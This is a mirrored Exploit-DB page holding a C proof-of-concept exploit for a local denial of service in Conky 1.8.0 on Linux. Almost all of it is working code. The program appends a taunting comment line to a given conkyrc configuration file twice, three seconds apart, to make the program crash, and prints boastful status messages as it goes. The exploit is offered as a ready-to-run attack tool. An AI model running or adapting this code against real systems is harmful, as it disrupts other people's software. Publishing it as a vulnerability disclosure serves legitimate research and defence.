Conky Linux 1.8.0 – Local Denial of Service (PoC) - 体验盒子

作者： Arturo D'Elia

日期： 2011-06-14

类别：

dos

平台：

linux

来源：https://www.exploit-db.com/exploits/17400/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

/**/

/*Vulnerability Conky 1.8.0 on Linux*/

/* Tested on: Linux with kernel 2.6.32.1-smp*/

/* Found: by Arturo D'Elia*/

/*Date found: 12 Dec 2010 */

/* Fix: No Fix*/

/*Contacts: arturo.delia@libero.it*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

char killyou[]="# w000wwwww i exploit it and i kill you!";

int main( int argc, char **argv){

FILE *fp;

/*Write the information program*/

printf("\n[*] Conky 1.8.0 Local DoS/PoC Exploit [*]\n");

printf("[*] Coded by: Arturo D'Elia\n");

printf("[*]Tested on: Linux\n");

printf("[*] Kernel version: 2.6.32.1-smp\n");

printf("[*]Bug Found: 12 Dec 2010\n");

printf("[*] Contacts: arturo.delia@libero.it\n\n");

/*Check the input parameter */

if(argc!=2)

exit(fprintf(stderr,"Usage: %s < path conkyrc >\n",argv[0]));

/*Check file exsist */

printf("[>] Open conky configuration\n");

if((fp=fopen(argv[1],"r"))==NULL)

exit(fprintf(stderr,"[x] Cannot open %s file\n",argv[1]));

fclose(fp);

/*Open file for append and i send it the*/

/*exploited strings */

fp=fopen(argv[1],"a");

printf("[>] Send the DoS/PoC string\n");

fprintf(fp,"%s\n",killyou);

fclose(fp);

/*Wait 3 seconds*/

usleep(3000000);

/*Resend exploited strings*/

fp=fopen(argv[1],"a");

fprintf(fp,"%s\n",killyou);

fclose(fp);

/*Ok guy. */

printf("[*] Ok guy, you kill it.\n\n");

return 0;

}